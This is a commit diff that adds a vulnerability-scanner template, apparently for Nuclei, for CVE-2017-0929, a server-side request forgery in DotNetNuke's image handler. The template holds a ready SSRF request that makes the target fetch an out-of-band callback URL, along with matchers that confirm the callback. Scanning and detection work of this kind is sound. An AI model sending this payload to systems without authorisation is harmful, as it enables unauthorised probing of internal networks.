commit
fe19393cb0
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2017-0929
|
||||
|
||||
info:
|
||||
name: DotNetNuke ImageHandler SSRF
|
||||
author: charanrayudu,meme-lord
|
||||
severity: high
|
||||
description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
|
||||
reference:
|
||||
- https://hackerone.com/reports/482634
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-0929
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2017-0929
|
||||
cwe-id: CWE-918
|
||||
tags: cve,cve2017,oast,ssrf,dnn
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
Loading…
Reference in New Issue